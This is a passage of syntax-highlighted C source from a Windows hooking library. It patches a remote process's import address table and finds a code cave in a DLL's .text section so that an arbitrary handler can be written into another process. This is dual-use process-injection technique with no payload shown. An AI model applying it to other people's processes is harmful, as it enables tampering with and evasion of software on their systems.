<span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">imageBase</span><span class="p">,</span><span class="w"> </span><span class="n">LPCTSTR</span><span class="w"> </span><span class="n">libName</span><span class="p">,</span><span class="w"> </span><span class="n">LPCTSTR</span><span class="w"> </span><span class="n">funcName</span><span class="p">,</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">redirectionAddress</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">PCHAR</span><span class="w"> </span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">dllNameBuf</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">PCHAR</span><span class="w"> </span><span class="n">lpFunctionNameBuf</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">PIMAGE_IMPORT_DESCRIPTOR</span><span class="w"> </span><span class="n">pImageImportDescriptor</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">IMAGE_THUNK_DATA</span><span class="w"> </span><span class="n">ThunkDataINT</span><span class="p">,</span><span class="w"> </span><span class="n">ThunkDataIAT</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">PIMAGE_IMPORT_BY_NAME</span><span class="w"> </span><span class="n">pImageImportByName</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">functionOffset</span><span class="p">,</span><span class="w"> </span><span class="n">firstRVA</span><span class="p">,</span><span class="w"> </span><span class="n">counter</span><span class="p">,</span><span class="w"> </span><span class="n">functionMemValue</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">firstRVA</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">functionMemValue</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">BOOL</span><span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">RetReadProcessMemory</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">buf</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">PVOID</span><span class="p">)(</span><span class="n">imageBase</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">imageImportDirectory</span><span class="o">-></span><span class="n">VirtualAddress</span><span class="p">),</span><span class="w"></span>
<span class="w"> </span><span class="mi">50</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">IMAGE_IMPORT_DESCRIPTOR</span><span class="p">)</span><span class="w"> </span><span class="c1">// not more than 50 dll's in a module :)</span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"RetReadProcessMemory(buf) in PrintImportDirectory() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">bSuccess</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="n">MEM_ALLOC_FAIL_CODE</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="n">free</span><span class="p">(</span><span class="o">&</span><span class="n">buf</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">pImageImportDescriptor</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">PIMAGE_IMPORT_DESCRIPTOR</span><span class="p">)</span><span class="n">buf</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* </span>
<span class="cm"> * pImageImportDescriptor[index].Characteristics is </span>
<span class="cm"> * set to 0 to indicate the end of the array of IMAGE_IMPORT_DESCRIPTORs.</span>
<span class="cm"> */</span><span class="w"></span>
<span class="w"> </span><span class="k">while</span><span class="w"> </span><span class="p">(</span><span class="n">pImageImportDescriptor</span><span class="o">-></span><span class="n">Characteristics</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Read the memory of the DLLName:) */</span><span class="w"></span>
<span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">RetReadProcessMemory</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">dllNameBuf</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">PVOID</span><span class="p">)(</span><span class="n">imageBase</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">pImageImportDescriptor</span><span class="o">-></span><span class="n">Name</span><span class="p">),</span><span class="w"></span>
<span class="w"> </span><span class="n">BUFFER_SIZE_SMALL</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"RetReadProcessMemory(dllNameBuf) in PrintImportDirectory() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">bSuccess</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="n">MEM_ALLOC_FAIL_CODE</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="n">free</span><span class="p">(</span><span class="o">&</span><span class="n">dllNameBuf</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">functionOffset</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">imageBase</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">pImageImportDescriptor</span><span class="o">-></span><span class="n">FirstThunk</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">counter</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">while</span><span class="w"> </span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Read the memory of the INT thunk table element :) */</span><span class="w"></span>
<span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ReadProcessMemory</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">PVOID</span><span class="p">)(</span><span class="n">imageBase</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">pImageImportDescriptor</span><span class="o">-></span><span class="n">OriginalFirstThunk</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">counter</span><span class="o">*</span><span class="k">sizeof</span><span class="p">(</span><span class="n">PVOID</span><span class="p">)),</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">ThunkDataINT</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">IMAGE_THUNK_DATA</span><span class="p">),</span><span class="w"></span>
<span class="w"> </span><span class="nb">NULL</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"RetReadProcessMemory(lpThunkINTBuffer) in PrintImportDirectory() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Read the memory of the IAT thunk table element :) */</span><span class="w"></span>
<span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ReadProcessMemory</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">PVOID</span><span class="p">)(</span><span class="n">imageBase</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">pImageImportDescriptor</span><span class="o">-></span><span class="n">FirstThunk</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">counter</span><span class="o">*</span><span class="k">sizeof</span><span class="p">(</span><span class="n">PVOID</span><span class="p">)),</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">ThunkDataIAT</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">IMAGE_THUNK_DATA</span><span class="p">),</span><span class="w"></span>
<span class="w"> </span><span class="nb">NULL</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"RetReadProcessMemory(lpThunkINTBuffer) in PrintImportDirectory() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Check if we reached the end of the array */</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">ThunkDataINT</span><span class="p">.</span><span class="n">u1</span><span class="p">.</span><span class="n">AddressOfData</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="n">ThunkDataIAT</span><span class="p">.</span><span class="n">u1</span><span class="p">.</span><span class="n">Function</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="k">break</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">counter</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="n">firstRVA</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ThunkDataINT</span><span class="p">.</span><span class="n">u1</span><span class="p">.</span><span class="n">AddressOfData</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* </span>
<span class="cm"> * Huge problem here is that the RVA's pointing to the names of the function in the IAT</span>
<span class="cm"> * are not in a ascending order. The RVA's may even be broken (yeah the linkers are bad^^)</span>
<span class="cm"> * and we may get invalid indices. How can we figure out that we do have a valid RVA in </span>
<span class="cm"> * pThunkDataINT->u1.AddressOfData ?!</span>
<span class="cm"> * There are just bad solutions (or lazyness when it comes to </span>
<span class="cm"> * heuristic fine tuning, so we apply a heuristic function on all RVA's of the </span>
<span class="cm"> * IMAGE_THUNK_DATA INT array to ignore RVA's which have a absolute difference from </span>
<span class="cm"> * more than 0x5000 bytes to the first RVA. What happens if the first RVA is a invalid </span>
<span class="cm"> * one? We're screwed, but at least the other is able to locate the problem quickly.</span>
<span class="cm"> */</span><span class="w"></span>
<span class="w"> </span><span class="c1">// test if we stumbled upon a suspicious RVA (after hoping that the first is not :/)</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">abs</span><span class="p">(</span><span class="n">ThunkDataINT</span><span class="p">.</span><span class="n">u1</span><span class="p">.</span><span class="n">AddressOfData</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">firstRVA</span><span class="p">)</span><span class="w"> </span><span class="o">></span><span class="w"> </span><span class="mh">0x5000</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"</span><span class="se">\n</span><span class="s">RVA in INT->u1.AddressOfData might be broken (%x) - ignoring</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">ThunkDataINT</span><span class="p">.</span><span class="n">u1</span><span class="p">.</span><span class="n">AddressOfData</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">RetReadProcessMemory</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">lpFunctionNameBuf</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">PVOID</span><span class="p">)(</span><span class="n">imageBase</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">ThunkDataINT</span><span class="p">.</span><span class="n">u1</span><span class="p">.</span><span class="n">AddressOfData</span><span class="p">),</span><span class="w"></span>
<span class="w"> </span><span class="n">BUFFER_SIZE_SMALL</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"RetReadProcessMemory(lpFunctionNameBuf) in HookFunction() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">bSuccess</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="n">MEM_ALLOC_FAIL_CODE</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="n">free</span><span class="p">(</span><span class="o">&</span><span class="n">lpFunctionNameBuf</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">pImageImportByName</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">PIMAGE_IMPORT_BY_NAME</span><span class="p">)</span><span class="n">lpFunctionNameBuf</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* When we are in the whished IAT entry, we write to the process the new value of the function pointer */</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">_stricmp</span><span class="p">(</span><span class="n">pImageImportByName</span><span class="o">-></span><span class="n">Name</span><span class="p">,</span><span class="w"> </span><span class="n">funcName</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="o">&&</span><span class="w"></span>
<span class="w"> </span><span class="n">_stricmp</span><span class="p">(</span><span class="n">dllNameBuf</span><span class="p">,</span><span class="w"> </span><span class="n">libName</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="w"></span>
<span class="w"> </span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">functionMemValue</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ThunkDataIAT</span><span class="p">.</span><span class="n">u1</span><span class="p">.</span><span class="n">Function</span><span class="p">;</span><span class="w"> </span><span class="cm">/* save because the struct will be freed up*/</span><span class="w"></span>
<span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">RetWriteProcessMemory</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">LPVOID</span><span class="p">)</span><span class="n">functionOffset</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">LPCVOID</span><span class="p">)</span><span class="o">&</span><span class="n">redirectionAddress</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">SIZE_T</span><span class="p">)</span><span class="k">sizeof</span><span class="p">(</span><span class="n">redirectionAddress</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"RetWriteProcessMemory() in HookFunction() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">bSuccess</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="n">MEM_ALLOC_FAIL_CODE</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="n">free</span><span class="p">(</span><span class="o">&</span><span class="n">lpFunctionNameBuf</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stdout</span><span class="p">,</span><span class="w"> </span><span class="s">"[i] Patched the IAT API %s in DLL %s at address 0x%x :)</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">pImageImportByName</span><span class="o">-></span><span class="n">Name</span><span class="p">,</span><span class="w"> </span><span class="n">dllNameBuf</span><span class="p">,</span><span class="w"> </span><span class="n">functionOffset</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">break</span><span class="p">;</span><span class="w"> </span><span class="cm">/* break the while loop because we updated the IAT*/</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">functionOffset</span><span class="w"> </span><span class="o">+=</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">PVOID</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">counter</span><span class="o">++</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* have we just been to the searched DLL? Assumes that Dll-Names in the IAT are uniqe */</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">_stricmp</span><span class="p">(</span><span class="n">dllNameBuf</span><span class="p">,</span><span class="w"> </span><span class="n">libName</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="c1">//free(&dllNameBuf);</span>
<span class="w"> </span><span class="k">break</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">pImageImportDescriptor</span><span class="o">++</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* We can free up now the allocated buffer */</span><span class="w"></span>
<span class="w"> </span><span class="n">free</span><span class="p">(</span><span class="o">&</span><span class="n">buf</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">functionMemValue</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="c1">// =============================================================================================</span>
<span class="cm">/*</span>
<span class="cm"> * Does the actual hooking. Finds a code cave in the .text section of the </span>
<span class="cm"> * DLL which exports the function specified by funcName. It writes the handler into</span>
<span class="cm"> * the code cave. The sanity of the handler is not a problem of this library.</span>
<span class="cm"> */</span><span class="w"></span>
<span class="n">HOOK_CONTEXT</span><span class="w"> </span><span class="o">*</span><span class="w"></span>
<span class="nf">HookFunction</span><span class="p">(</span><span class="n">HANDLE</span><span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"> </span><span class="n">LPCTSTR</span><span class="w"> </span><span class="n">libName</span><span class="p">,</span><span class="w"> </span><span class="n">LPCTSTR</span><span class="w"> </span><span class="n">funcName</span><span class="p">,</span><span class="w"> </span><span class="n">PVOID</span><span class="w"> </span><span class="n">handlerBuf</span><span class="p">,</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">handlerSize</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">pPEP</span><span class="p">,</span><span class="w"> </span><span class="n">oldFunctionPointer</span><span class="p">,</span><span class="w"> </span><span class="n">pHandler</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">SIZE_T</span><span class="w"> </span><span class="n">nBytesWritten</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">PIMAGE_DATA_DIRECTORY</span><span class="w"> </span><span class="n">imageImportDirectory</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">BOOL</span><span class="w"> </span><span class="n">bSuccess</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">HOOK_CONTEXT</span><span class="w"> </span><span class="o">*</span><span class="n">pHookContext</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">pHookContext</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">malloc</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="n">HOOK_CONTEXT</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">pHookContext</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"malloc in HookFunction() failed</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Locate the Process Environment Block */</span><span class="w"></span>
<span class="w"> </span><span class="n">pPEP</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">FindRemotePEB</span><span class="p">(</span><span class="n">hProcess</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">pPEP</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"[!] FindRemotePEB() failed...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"[i] Remote PEB found: 0x%x. ImageBase address is 0x%x</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">pPEP</span><span class="p">,</span><span class="w"> </span><span class="p">(</span><span class="n">DWORD</span><span class="p">)((</span><span class="n">PPEB</span><span class="p">)</span><span class="n">pPEP</span><span class="p">)</span><span class="o">-></span><span class="n">ImageBaseAddress</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Read the RVA to the ImageImportDirectory */</span><span class="w"></span>
<span class="w"> </span><span class="n">imageImportDirectory</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ReadRemoteDataDirectoryRVA</span><span class="p">(</span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">LPCVOID</span><span class="p">)((</span><span class="n">PPEB</span><span class="p">)</span><span class="n">pPEP</span><span class="p">)</span><span class="o">-></span><span class="n">ImageBaseAddress</span><span class="p">,</span><span class="w"> </span><span class="mi">1</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">imageImportDirectory</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"[!] ReadRemoteDataDirectoryRV() failed...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"[i] Remote Image Parsed. Virtual Address of RemoteDataDirectory: 0x%x</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">imageImportDirectory</span><span class="o">-></span><span class="n">VirtualAddress</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Find a code cave where to write the handler */</span><span class="w"></span>
<span class="w"> </span><span class="n">pHandler</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">FindRemoteCodeCave</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">((</span><span class="n">PPEB</span><span class="p">)</span><span class="n">pPEP</span><span class="p">)</span><span class="o">-></span><span class="n">ImageBaseAddress</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">libName</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">handlerSize</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">pHandler</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"[!] Cannot find code cave in remote image...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"></span>
